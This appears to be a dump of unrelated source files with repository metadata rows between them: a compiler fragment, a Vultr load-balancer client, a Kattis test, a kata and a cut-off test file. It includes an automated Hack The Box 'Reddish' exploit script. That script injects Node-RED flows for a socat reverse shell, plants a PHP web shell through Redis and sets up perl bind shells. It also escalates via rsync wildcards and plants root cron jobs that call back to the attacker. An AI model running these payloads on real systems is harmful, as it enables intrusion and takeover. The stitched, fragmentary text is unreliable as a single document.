cond_block = self._addNewTargetBb(block, None, f"{block.label:s}_IfC", o)
self._onAllPredecsKnown(cond_block)
cond_block, cond = self.visit_expr(cond_block, o.cond)
end_if_block = SsaBasicBlock(self.ssaCtx, f"{block.label:s}_IfE")
self.visit_If_branch(o, f"{block.label:s}_If", cond_block, end_if_block, cond, o.ifTrue)
for i, (c, stms) in enumerate(o.elIfs):
cond_block, cond = self.visit_expr(cond_block, c)
self.visit_If_branch(o, f"{block.label:s}_Elif{i:d}", cond_block, end_if_block, cond, stms)
self.visit_If_branch(o, f"{block.label:s}_Else", cond_block, end_if_block, None, o.ifFalse)
self._onAllPredecsKnown(end_if_block)
return end_if_block
def visit_Assignment(self, block: SsaBasicBlock, o: HdlAssignmentContainer) -> SsaBasicBlock:
block, src = self.visit_expr(block, o.src)
block.origins.append(o)
# this may result in:
# * store instruction
        # * just the registration of the variable for the symbol
        # * only a segment of a bit vector can be assigned; this results in the assignment of the concatenation of the previous and new value
self.m_ssa_u.writeVariable(o.dst, o.indexes, block, src)
# ld = SsaInstr(o.dst, src)
# block.appendInstruction(ld)
# if isinstance(src, SsaValue):
# src.users.append(ld)
return block
def visit_Write(self, block: SsaBasicBlock, o: HlsStreamProcWrite) -> SsaBasicBlock:
block, src = self.visit_expr(block, o.getSrc())
o.operands = (src,)
block.appendInstruction(o)
block.origins.append(o)
if isinstance(src, SsaValue):
src.users.append(o)
return block
def finalize(self):
assert not self.m_ssa_u.incompletePhis, self.m_ssa_u.incompletePhis
| 45.487342
| 136
| 0.64881
| 13,273
| 0.923211
| 0
| 0
| 347
| 0.024136
| 0
| 0
| 2,937
| 0.204285
|
6202a8816bac81aec1be652ea835f294593e8695
| 12,009
|
py
|
Python
|
pyvultr/v2/load_balance.py
|
luxiaba/pyvultr
|
29b45d036f728c15d91c4b590bd893b9c7f609ae
|
[
"MIT"
] | 4
|
2021-12-01T18:06:18.000Z
|
2022-01-22T12:39:52.000Z
|
pyvultr/v2/load_balance.py
|
luxiaba/pyvultr
|
29b45d036f728c15d91c4b590bd893b9c7f609ae
|
[
"MIT"
] | 1
|
2021-12-19T14:05:42.000Z
|
2021-12-19T14:05:42.000Z
|
pyvultr/v2/load_balance.py
|
luxiaba/pyvultr
|
29b45d036f728c15d91c4b590bd893b9c7f609ae
|
[
"MIT"
] | 1
|
2021-12-20T04:54:08.000Z
|
2021-12-20T04:54:08.000Z
|
from dataclasses import dataclass
from functools import partial
from typing import Dict, List, Optional
from urllib.parse import urljoin
from pyvultr.utils import BaseDataclass, VultrPagination, get_only_value, merge_args
from .base import BaseVultrV2, command
from .enums import LoadBalanceAlgorithm, LoadBalanceProtocol
@dataclass
class LoadBalanceGenericInfo(BaseDataclass):
# If true, this will redirect all HTTP traffic to HTTPS.
# You must have an HTTPS rule and SSL certificate installed on the load balancer to enable this option.
ssl_redirect: bool
sticky_sessions: Dict # Array of sticky session cookies({'cookie_name': 'xxx'}).
# ID of the private network you wish to use.
# If private_network is omitted it will default to the public network.
private_network: str
# The balancing algorithm, see `enums.LoadBalanceAlgorithm` for possible values.
balancing_algorithm: str = LoadBalanceAlgorithm.ROUND_ROBIN.value
# If true, you must configure backend nodes to accept Proxy protocol. default is false.
proxy_protocol: bool = False
@dataclass
class LoadBalanceHealthCheck(BaseDataclass):
protocol: str # The protocol to use for health checks, see `enums.LoadBalanceProtocol` for possible values.
port: int # The port to use for health checks.
path: str # HTTP Path to check. Only applies if Protocol is HTTP or HTTPS.
check_interval: int # Interval between health checks.
response_timeout: int # Timeout before health check fails.
unhealthy_threshold: int # Number times a check must fail before becoming unhealthy.
healthy_threshold: int # Number of times a check must succeed before returning to healthy status.
@dataclass
class LoadBalanceForwardRule(BaseDataclass):
id: str # A unique ID for the forwarding rule.
# The protocol on the Load Balancer to forward to the backend.
# see `enums.LoadBalanceProtocol` for possible values.
frontend_protocol: str
frontend_port: int # The port number on the Load Balancer to forward to the backend.
# The protocol destination on the backend server.
# see `enums.LoadBalanceProtocol` for possible values.
backend_protocol: str
backend_port: int # The port number destination on the backend server.
@dataclass
class LoadBalanceFirewallRule(BaseDataclass):
id: str # A unique ID for the firewall rule.
port: int # Port for this rule.
# If the source string is given a value of "cloudflare" then cloudflare IPs will be supplied.
# Otherwise enter a IP address with subnet size that you wish to permit through the firewall.
# | Value | Description
# | ---------------- | -----------
# | "192.168.1.1/16" | Ip address with a subnet size.
# | "cloudflare" | Allow all of Cloudflare's IP space through the firewall
source: str
ip_type: str # The type of IP rule, see `enums.IPType` for possible values.
@dataclass
class LoadBalance(BaseDataclass):
id: str # A unique ID for the Load Balancer.
date_created: str # Date this Load Balancer was created.
# The Region id where the instance is located, check `RegionAPI.list` and `RegionItem.id` for available regions.
region: str
label: str # The user-supplied label for this load-balancer.
status: str # The current status, see `enums.LoadBalanceStatus` for possible values.
ipv4: str # The IPv4 address of this Load Balancer.
ipv6: str # The IPv6 address of this Load Balancer.
generic_info: LoadBalanceGenericInfo # An object containing additional options.
health_check: LoadBalanceHealthCheck
has_ssl: bool # Indicates if this Load Balancer has an SSL certificate installed.
forwarding_rules: List[LoadBalanceForwardRule] # An array of forwarding rule objects.
instances: List[str] # Array of Instance ids attached to this Load Balancer.
firewall_rules: List[LoadBalanceFirewallRule] # An array of firewall rule objects.
class LoadBalanceAPI(BaseVultrV2):
"""Vultr LoanBalance API.
Reference: https://www.vultr.com/api/#tag/load-balancer
Load Balancers sit in front of your application and distribute incoming traffic across multiple Instances.
When you control the load balancer via the API, you can inspect the results in the customer portal.
Attributes:
api_key: Vultr API key, we get it from env variable `$VULTR_API_KEY` if not provided.
"""
def __init__(self, api_key: Optional[str] = None):
super().__init__(api_key)
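    # Minimal usage sketch (assumes a valid key in $VULTR_API_KEY or passed explicitly;
    # the region and label values below are placeholders):
    #   api = LoadBalanceAPI()
    #   for lb in api.list(capacity=10):
    #       print(lb.id, lb.status)
    #   new_lb = api.create(region="ewr", label="my-lb")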
@property
def base_url(self):
"""Get base url for all API in this section."""
return urljoin(super().base_url, "load-balancers")
@command
def list(self, per_page: int = None, cursor: str = None, capacity: int = None) -> VultrPagination[LoadBalance]:
"""List the Load Balancers in your account.
Args:
per_page: Number of items requested per page. Default is 100 and Max is 500.
cursor: Cursor for paging.
capacity: The capacity of the VultrPagination[LoadBalanceItem], see `VultrPagination` for details.
Returns:
VultrPagination[LoadBalance]: A list-like object of `LoadBalanceItem` object.
"""
return VultrPagination[LoadBalance](
fetcher=self._get,
cursor=cursor,
page_size=per_page,
return_type=LoadBalance,
capacity=capacity,
)
@command
def create(self, region: str, **kwargs) -> LoadBalance:
"""Create a new Load Balancer in a particular `region`.
Args:
region: The Region id to create this Load Balancer.
            **kwargs: New Load Balancer parameters.
Returns:
LoadBalance: The LoadBalanceItem object.
"""
_fixed_kwargs = {"region": region}
resp = self._post(json=merge_args(kwargs, _fixed_kwargs))
return LoadBalance.from_dict(get_only_value(resp))
@command
def get(self, load_balancer_id: str) -> LoadBalance:
"""Get information for a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
Returns:
LoadBalance: The LoadBalanceItem object.
"""
resp = self._get(f"/{load_balancer_id}")
return LoadBalance.from_dict(get_only_value(resp))
@command
def update(self, load_balancer_id: str, **kwargs):
"""Update information for a Load Balancer.
All attributes are optional. If not set, the attributes will retain their original values.
Args:
            load_balancer_id: The Load Balancer id.
            **kwargs: Updated Load Balancer parameters.
Returns:
STATUS CODE: 204
/NO CONTENT/
"""
return self._patch(f"/{load_balancer_id}", json=kwargs)
@command
def delete(self, load_balancer_id: str):
"""Delete a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
Returns:
STATUS CODE: 204
/NO CONTENT/
"""
return self._delete(f"/{load_balancer_id}")
@command
def list_forwarding_rules(
self,
load_balancer_id: str,
per_page: int = None,
cursor: str = None,
capacity: int = None,
) -> VultrPagination[LoadBalanceForwardRule]:
"""List the forwarding rules for a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
per_page: number of items requested per page. Default is 100 and Max is 500.
cursor: cursor for paging.
capacity: The capacity of the VultrPagination[LoadBalanceForwardRule], see `VultrPagination` for details.
Returns:
VultrPagination[LoadBalanceForwardRule]: A list-like object of `LoadBalanceForwardRule` object.
"""
fetcher = partial(self._get, endpoint=f"/{load_balancer_id}/forwarding-rules")
return VultrPagination[LoadBalanceForwardRule](
fetcher=fetcher,
cursor=cursor,
page_size=per_page,
return_type=LoadBalanceForwardRule,
capacity=capacity,
)
@command
def create_forwarding_rule(
self,
load_balancer_id: str,
frontend_protocol: LoadBalanceProtocol,
frontend_port: int,
backend_protocol: LoadBalanceProtocol,
backend_port: int,
) -> LoadBalanceForwardRule:
"""Create a new forwarding rule for a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
frontend_protocol: The protocol on the Load Balancer to forward to the backend.
frontend_port: The port number on the Load Balancer to forward to the backend.
backend_protocol: The protocol destination on the backend server.
backend_port: The port number destination on the backend server.
Returns:
LoadBalanceForwardRule: A `LoadBalanceForwardRule` object.
"""
_json = {
"frontend_protocol": frontend_protocol.value,
"frontend_port": frontend_port,
"backend_protocol": backend_protocol.value,
"backend_port": backend_port,
}
resp = self._post(f"/{load_balancer_id}/forwarding-rules", json=_json)
return LoadBalanceForwardRule.from_dict(get_only_value(resp))
@command
def get_forwarding_rule(self, load_balancer_id: str, forwarding_rule_id: str) -> LoadBalanceForwardRule:
"""Get information for a Forwarding Rule on a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
forwarding_rule_id: The Forwarding Rule id.
Returns:
LoadBalanceForwardRule: A `LoadBalanceForwardRule` object.
"""
resp = self._get(f"/{load_balancer_id}/forwarding-rules/{forwarding_rule_id}")
return LoadBalanceForwardRule.from_dict(get_only_value(resp))
@command
def delete_forwarding_rule(self, load_balancer_id: str, forwarding_rule_id: str):
"""Delete a Forwarding Rule on a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
forwarding_rule_id: The Forwarding Rule id.
Returns:
STATUS CODE: 204
/NO CONTENT/
"""
return self._delete(f"/{load_balancer_id}/forwarding-rules/{forwarding_rule_id}")
@command
def list_firewall_rules(
self,
load_balancer_id: str,
per_page: int = None,
cursor: str = None,
capacity: int = None,
) -> VultrPagination[LoadBalanceFirewallRule]:
"""List the firewall rules for a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
per_page: number of items requested per page. Default is 100 and Max is 500.
cursor: cursor for paging.
capacity: The capacity of the VultrPagination[LoadBalanceFirewallRule], see `VultrPagination` for details.
Returns:
VultrPagination[LoadBalanceFirewallRule]: A list-like object of `LoadBalanceFirewallRule` object.
"""
fetcher = partial(self._get, endpoint=f"/{load_balancer_id}/firewall-rules")
return VultrPagination[LoadBalanceFirewallRule](
fetcher=fetcher,
cursor=cursor,
page_size=per_page,
return_type=LoadBalanceFirewallRule,
capacity=capacity,
)
@command
def get_firewall_rule(self, load_balancer_id: str, forwarding_rule_id: str) -> LoadBalanceFirewallRule:
"""Get a firewall rule for a Load Balancer.
Args:
            load_balancer_id: The Load Balancer id.
forwarding_rule_id: The firewall rule id.
Returns:
LoadBalanceFirewallRule: A `LoadBalanceFirewallRule` object.
"""
resp = self._get(f"/{load_balancer_id}/firewall-rules/{forwarding_rule_id}")
return LoadBalanceFirewallRule.from_dict(get_only_value(resp))
| 39.117264
| 118
| 0.670081
| 11,612
| 0.966941
| 0
| 0
| 11,045
| 0.919727
| 0
| 0
| 7,046
| 0.586727
|
62034dcbe266726fc371d74a18776dc2103cd7d1
| 12,848
|
py
|
Python
|
hacking/HTB/Reddish/autopwn_reddish.py
|
Qazeer/code-snippets
|
6b15afb66312cbcf7c29f9ea32933ad0cbf65154
|
[
"Unlicense"
] | 219
|
2017-12-12T20:05:37.000Z
|
2022-03-27T06:08:08.000Z
|
hacking/HTB/Reddish/autopwn_reddish.py
|
FDlucifer/code-snippets
|
2635cf04bc90f1cd0e6b850a9b70d689f1ab7aba
|
[
"Unlicense"
] | 3
|
2018-11-10T13:33:42.000Z
|
2020-10-21T13:53:00.000Z
|
hacking/HTB/Reddish/autopwn_reddish.py
|
FDlucifer/code-snippets
|
2635cf04bc90f1cd0e6b850a9b70d689f1ab7aba
|
[
"Unlicense"
] | 108
|
2017-12-17T18:17:14.000Z
|
2022-03-15T13:24:44.000Z
|
#!/usr/bin/env python2
# Author: Alamot
import json
import time
import uuid
import fcntl
import base64
import urllib
import random
import requests
from pwn import *
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15].encode())
)[20:24])
# context.log_level = 'debug'
LHOST = get_ip_address('tun0')
LPORT1 = "60000"
LPORT2 = str(random.randint(60003, 62535))
LPORT3 = str(random.randint(62535, 65535))
LPORT4 = "60001"
UUIDNAME = str(uuid.uuid4())[:8]
SOCAT_SRCPATH = "socat"
SOCAT_DSTPATH = "/var/tmp/socat" + UUIDNAME
SUBASH_PATH = "/var/tmp/" + UUIDNAME
CRONPL_PATH = "/tmp/" + UUIDNAME
def send_payloads():
session = requests.Session()
# Get id
p1 = log.progress("Getting our id")
headers = {"User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Connection":"close","Accept-Language":"en","Accept":"*/*"}
try:
response = session.post("http://10.10.10.94:1880/", headers=headers)
if response.status_code != 200:
p1.failure("Status "+str(response.status_code))
sys.exit()
else:
uid = json_data = json.loads(response.text)["id"].strip()
p1.success("OK (id = " + uid + ")")
except requests.exceptions.RequestException as e:
p1.failure(str(e))
sys.exit()
# Load flows
p2 = log.progress("Loading node-red flows")
with open(SOCAT_SRCPATH, 'r') as f:
b64upload = base64.b64encode(f.read())
rawBody = "{\"flows\":[{\"id\":\"e97f052f.2f3d48\",\"type\":\"tab\",\"label\":\"Flow 1\"},{\"id\":\"6c08c84b.d9c578\",\"type\":\"inject\",\"z\":\"e97f052f.2f3d48\",\"name\":\"\",\"topic\":\"\",\"payload\":\"node -e '(function(){ var cp = require(\\\"child_process\\\"), sh = cp.spawn(\\\"/bin/sh\\\", [\\\"-c\\\", \\\"cat " + SOCAT_DSTPATH + ".b64 | base64 -d > " +SOCAT_DSTPATH + " && chmod +x " + SOCAT_DSTPATH + " && " + SOCAT_DSTPATH + " exec:/bin/bash,pty,rawer,echo=0,stderr,setsid,sigint tcp:" + LHOST + ":" + LPORT1 + "\\\"]); return /a/; })();'\",\"payloadType\":\"str\",\"repeat\":\"\",\"crontab\":\"\",\"once\":false,\"onceDelay\":0.1,\"x\":151,\"y\":88,\"wires\":[[\"d27da06a.44a1a\"]]},{\"id\":\"d27da06a.44a1a\",\"type\":\"exec\",\"z\":\"e97f052f.2f3d48\",\"command\":\"\",\"addpay\":true,\"append\":\"\",\"useSpawn\":\"false\",\"timer\":\"\",\"oldrc\":false,\"name\":\"\",\"x\":310,\"y\":80,\"wires\":[[],[],[]]},{\"id\":\"fae51292.d8e68\",\"type\":\"inject\",\"z\":\"e97f052f.2f3d48\",\"name\":\"\",\"topic\":\"\",\"payload\":\"" + b64upload +"\",\"payloadType\":\"str\",\"repeat\":\"\",\"crontab\":\"\",\"once\":false,\"onceDelay\":0.1,\"x\":113,\"y\":260,\"wires\":[[\"7e1e7cb5.664234\"]]},{\"id\":\"7e1e7cb5.664234\",\"type\":\"file\",\"z\":\"e97f052f.2f3d48\",\"name\":\"\",\"filename\":\"" + SOCAT_DSTPATH +".b64\",\"appendNewline\":false,\"createDir\":false,\"overwriteFile\":\"true\",\"x\":320,\"y\":260,\"wires\":[]}]}"
headers = {"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0","Referer":"http://10.10.10.94:1880/red/"+uid+"/flows","Node-RED-API-Version":"v2","Connection":"close","Accept-Language":"en-US,en;q=0.5","DNT":"1","Content-Type":"application/json; charset=utf-8","Node-RED-Deployment-Type":"full"}
try:
response = session.post("http://10.10.10.94:1880/red/"+uid+"/flows", data=rawBody, headers=headers)
if response.status_code != 200:
p2.failure("Status "+str(response.status_code))
sys.exit()
else:
p2.success("OK")
except requests.exceptions.RequestException as e:
p2.failure(str(e))
sys.exit()
# Inject base64-encoded socat
p3 = log.progress("Injecting base64-encoded socat")
headers = {"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0","Referer":"http://10.10.10.94:1880/red/"+uid+"/inject/fae51292.d8e68","Node-RED-API-Version":"v2","Connection":"close","Accept-Language":"en-US,en;q=0.5","DNT":"1"}
try:
response = session.post("http://10.10.10.94:1880/red/"+uid+"/inject/fae51292.d8e68", headers=headers)
if response.status_code != 200:
p3.failure("Status "+str(response.status_code))
sys.exit()
else:
p3.success("OK")
except requests.exceptions.RequestException as e:
p3.failure(str(e))
sys.exit()
# Inject nodejs reverse shell
p4 = log.progress("Injecting socat reverse shell via nodejs [" + LHOST + ":" + str(LPORT1) + "]")
headers = {"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0","Referer":"http://10.10.10.94:1880/red/" + uid + "/inject/6c08c84b.d9c578","Node-RED-API-Version":"v2","Connection":"close","Accept-Language":"en-US,en;q=0.5","DNT":"1"}
try:
response = session.post("http://10.10.10.94:1880/red/" + uid + "/inject/6c08c84b.d9c578", headers=headers)
if response.status_code != 200:
p4.failure("Status "+str(response.status_code))
sys.exit()
else:
p4.success("OK")
except requests.exceptions.RequestException as e:
p4.failure(str(e))
sys.exit()
print("What shell do you want?")
print("[1] root@nodered")
print("[2] www-data@www")
print("[3] root@www")
print("[4] root@backup")
print("[5] root@reddish")
print("[6] Exit")
response = None
while response not in ["1", "2", "3", "4", "5", "6"]:
response = raw_input("Please enter a number 1-6: ").strip()
if response == "6":
sys.exit()
try:
threading.Thread(target=send_payloads).start()
except Exception as e:
log.error(str(e))
socat = listen(LPORT1, bindaddr=LHOST, timeout=20).wait_for_connection()
if response == "1":
socat.interactive()
sys.exit()
with log.progress("Uploading " + UUIDNAME + ".php on the www container via redis") as p:
socat.sendline("/bin/echo -ne '*1\\r\\n$8\\r\\nFLUSHALL\\r\\n*3\\r\\n$3\\r\\nSET\\r\\n$1\\r\\n1\\r\\n$45\\r\\n<?php echo shell_exec($_GET[\"e\"].\" 2>&1\"); ?>\\r\\n*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$10\\r\\ndbfilename\\r\\n$12\\r\\n" + UUIDNAME + ".php\\r\\n*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$3\\r\\ndir\\r\\n$46\\r\\n/var/www/html/8924d0549008565c554f8128cd11fda4\\r\\n*1\\r\\n$4\\r\\nSAVE\\r\\n' | " + SOCAT_DSTPATH + " - TCP:redis:6379")
socat.sendline("/bin/echo -ne 'GET /8924d0549008565c554f8128cd11fda4/" + UUIDNAME+ ".php?e=$(whoami)@$(hostname)END HTTP/1.1\\r\\nHost: nodered\\r\\nUser-agent: curl\\r\\n\\r\\n' | " + SOCAT_DSTPATH + " - TCP:www:80")
output = socat.recvuntil("www-data@www")
if "www-data@www" in output:
p.success("OK (user = www-data@www)")
else:
p.failure("FAIL")
sys.exit()
with log.progress("Sending perl bind shell [www-data@www:" + str(LPORT2) + "] via " + UUIDNAME + ".php & trying to connect") as p:
perl_payload = "perl -e 'use Socket;$p=" + str(LPORT2) +";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};'"
urled_perl_payload = urllib.quote_plus(perl_payload)
socat.sendline("/bin/echo -ne 'GET /8924d0549008565c554f8128cd11fda4/" + UUIDNAME + ".php?e=" + urled_perl_payload + " HTTP/1.1\\r\\nHost: nodered\\r\\nUser-Agent: curl\\r\\n\\r\\n' | " + SOCAT_DSTPATH + " - TCP:www:80")
socat.sendline(SOCAT_DSTPATH + " file:`tty`,echo=0,rawer TCP:www:" + str(LPORT2))
output = socat.recvuntil("shell", timeout=20)
if "shell" in output:
p.success("OK")
else:
p.failure("FAIL")
sys.exit()
socat.sendline("script --return -c '/bin/bash -i' /dev/null")
socat.clean(1)
socat.sendline("stty raw -echo")
if response == "2":
socat.interactive()
sys.exit()
with log.progress("Exploiting wildcards for privesc. Wait at most 180 secs for rsync backup job to run") as p:
socat.sendline('echo "/bin/cp /bin/bash ' + SUBASH_PATH + ';/bin/chmod 4755 ' + SUBASH_PATH + '" > "/var/www/html/f187a0ec71ce99642e4f0afbd441a68b/' + UUIDNAME + '.rdb"')
socat.sendline('touch "/var/www/html/f187a0ec71ce99642e4f0afbd441a68b/-e sh ' + UUIDNAME + '.rdb"')
count = 0
while True:
p.status(str(count))
sleep(1)
socat.sendline("[ -f " + SUBASH_PATH + " ] && echo 'OK' || echo 'NO'")
socat.recvuntil('$ ')
output = socat.recv(3).strip()
if "OK" in output:
p.success("OK")
break
count += 1
if count > 180:
p.failure("FAIL")
sys.exit()
socat.sendline(SUBASH_PATH + ' -i -p')
socat.sendline("cd /root")
socat.clean(1)
if response == "3":
socat.interactive()
sys.exit()
with log.progress("Sending a cronjob for bind shell [root@backup:" +str(LPORT3)+ "]. Please wait") as p:
socat.sendline("echo 'use Socket;$p=" + str(LPORT3) + ";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};' > " + CRONPL_PATH + ".pl")
socat.sendline("echo '* * * * * root /usr/bin/perl " + CRONPL_PATH + ".pl' > " + CRONPL_PATH + "cronjob")
socat.sendline("rsync -a " + CRONPL_PATH + ".pl backup::src" + CRONPL_PATH + ".pl")
socat.sendline("rsync -a " + CRONPL_PATH + "cronjob backup::src/etc/cron.d/")
for i in range(62):
p.status(str(61 - i))
time.sleep(1)
socat.sendline("perl -MFcntl=F_SETFL,F_GETFL,O_NONBLOCK -MSocket '-e$0=perl;socket($c,AF_INET,SOCK_STREAM,0)&&connect($c,pack_sockaddr_in("+ str(LPORT3) + ",inet_aton(\"backup\")))||die$!;fcntl$_,F_SETFL,O_NONBLOCK|fcntl$_,F_GETFL,0 for@d=(*STDIN,$c),@e=($c,*STDOUT);L:for(0,1){sysread($d[$_],$f,8**5)||exit and$f[$_].=$f if vec$g,$_*($h=fileno$c),1;substr$f[$_],0,syswrite($e[$_],$f[$_],8**5),\"\";vec($g,$_*$h,1)=($i=length$f[$_]<8**5);vec($j,$_||$h,1)=!!$i}select$g,$j,$k,5;goto L'")
output = socat.recvuntil("shell", timeout=20)
if "shell" in output:
p.success("OK")
else:
p.failure("FAIL")
sys.exit()
socat.sendline("script --return -c '/bin/bash -i' /dev/null")
socat.clean(1)
socat.sendline("stty raw -echo")
if response == "4":
socat.interactive()
sys.exit()
with log.progress("Sending reverse shell cronjob [" + LHOST + ":" +str(LPORT4)+ "] for root@host. Please wait") as p:
socat.sendline("mkdir /mnt/sda1")
socat.sendline("mount /dev/sda1 /mnt/sda1")
socat.sendline("cat /mnt/sda1/root/root.txt")
socat.sendline("echo 'import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(LPORT4) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");pty.spawn([\"/bin/bash\",\"-i\"]);s.close();exit();' > /mnt/sda1/tmp/" + UUIDNAME + ".py")
socat.sendline("echo '* * * * * root /usr/bin/python /tmp/" + UUIDNAME + ".py' > /mnt/sda1/etc/cron.d/" + UUIDNAME + "cronjob")
host_shell = listen(LPORT4, bindaddr=LHOST, timeout=65).wait_for_connection()
if host_shell.sock is None:
p.failure("FAIL")
sys.exit()
else:
p.success("OK")
host_shell.interactive()
sys.exit()
'''
$ ./autopwn_reddish.py
What shell do you want?
[1] root@nodered
[2] www-data@www
[3] root@www
[4] root@backup
[5] root@reddish
[6] Exit
Please enter a number 1-6: 5
[+] Getting our id: OK (id = 25af4604ab3402f2bdea796ac32bbcc3)
[+] Trying to bind to 10.10.12.229 on port 60000: Done
[+] Waiting for connections on 10.10.12.229:60000: Got connection from 10.10.10.94 on port 46784
[+] Loading node-red flows: OK
[+] Injecting base64-encoded socat: OK
[+] Injecting socat reverse shell via nodejs [10.10.12.229:60000]: OK
[+] Uploading 1994851d.php on the www container via redis: OK (user = www-data@www)
[+] Sending perl bind shell [www-data@www:61031] via 1994851d.php & trying to connect: OK
[+] Exploiting wildcards for privesc. Wait at most 180 secs for rsync backup job to run: OK
[+] Sending a cronjob for bind shell [root@backup:65104]. Please wait: OK
[+] Sending reverse shell cronjob [10.10.12.229:60001] for root@host. Please wait: OK
[+] Trying to bind to 10.10.12.229 on port 60001: Done
[+] Waiting for connections on 10.10.12.229:60001: Got connection from 10.10.10.94 on port 50432
[*] Switching to interactive mode
root@reddish:~# $
'''
| 53.090909
| 1,448
| 0.611768
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,403
| 0.576199
|
6204c146ab9d8f200d7b8f6e6bb1d0148b8857e7
| 1,735
|
py
|
Python
|
test/test_k_apaxiaaans.py
|
ivanlyon/exercises
|
0792976ae2acb85187b26a52812f9ebdd119b5e8
|
[
"MIT"
] | null | null | null |
test/test_k_apaxiaaans.py
|
ivanlyon/exercises
|
0792976ae2acb85187b26a52812f9ebdd119b5e8
|
[
"MIT"
] | null | null | null |
test/test_k_apaxiaaans.py
|
ivanlyon/exercises
|
0792976ae2acb85187b26a52812f9ebdd119b5e8
|
[
"MIT"
] | null | null | null |
import io
import unittest
from unittest.mock import patch
from kattis import k_apaxiaaans
###############################################################################
class SampleInput(unittest.TestCase):
'''Problem statement sample inputs and outputs'''
def test_sample_input_1(self):
'''Run and assert problem statement sample 1 input and output.'''
inputs = 'robert\n'
outputs = 'robert\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_apaxiaaans.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
def test_sample_input_2(self):
'''Run and assert problem statement sample 2 input and output.'''
inputs = 'rooobert\n'
outputs = 'robert\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_apaxiaaans.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
def test_sample_input_3(self):
'''Run and assert problem statement sample 3 input and output.'''
inputs = 'roooooobertapalaxxxxios\n'
outputs = 'robertapalaxios\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_apaxiaaans.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
###############################################################################
if __name__ == '__main__':
unittest.main()
| 36.145833
| 79
| 0.571182
| 1,433
| 0.825937
| 0
| 0
| 0
| 0
| 0
| 0
| 575
| 0.331412
|
6204c171addcdbab6da1839b62dea0022b3b30e5
| 829
|
py
|
Python
|
kata/Greeting My Friends [Arrays].py
|
DJO3/code_wars
|
8e9bc8cd903bfc61dafaf11cb9ff289f469e761f
|
[
"MIT"
] | null | null | null |
kata/Greeting My Friends [Arrays].py
|
DJO3/code_wars
|
8e9bc8cd903bfc61dafaf11cb9ff289f469e761f
|
[
"MIT"
] | null | null | null |
kata/Greeting My Friends [Arrays].py
|
DJO3/code_wars
|
8e9bc8cd903bfc61dafaf11cb9ff289f469e761f
|
[
"MIT"
] | null | null | null |
"""
You are given an array of friends.
Write a function called greeting_for_all_friends that takes one argument, friends.
The function takes an array of friend names and returns an array of greeting messages.
Message sample: for the friend "Bilal" we get "Hello, Bilal!"
Rules:
If the argument is None, the function should return None
If the argument is an empty array, the function should return None
If the argument is a valid array of strings, the function should return a hello message for every array entry
"""
import sys
def greeting_for_all_friends(friends):
if friends:  # covers both None and an empty list
greeting = ["Hello, {}!".format(friend) for friend in friends]
return greeting
if __name__ == "__main__":
f = sys.argv[1:]
print(greeting_for_all_friends(f))
# print(greeting_for_all_friends(["Bob"]))
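# Example from the problem statement: greeting_for_all_friends(["Bilal"]) returns ["Hello, Bilal!"],
# while greeting_for_all_friends(None) and greeting_for_all_friends([]) both return None.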
| 28.586207
| 108
| 0.738239
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 577
| 0.696019
|
6204f9cec65f309afe5538b66f4dfe8bac9af897
| 11,469
|
py
|
Python
|
tests/test_transforms.py
|
rushyaP/pytorchvideo
|
875b2df67312f5f4c7d581a332701cc7eca11c14
|
[
"Apache-2.0"
] | 1
|
2021-05-20T21:25:14.000Z
|
2021-05-20T21:25:14.000Z
|
tests/test_transforms.py
|
rushyaP/pytorchvideo
|
875b2df67312f5f4c7d581a332701cc7eca11c14
|
[
"Apache-2.0"
] | null | null | null |
tests/test_transforms.py
|
rushyaP/pytorchvideo
|
875b2df67312f5f4c7d581a332701cc7eca11c14
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import unittest
from collections import Counter
import numpy as np
import torch
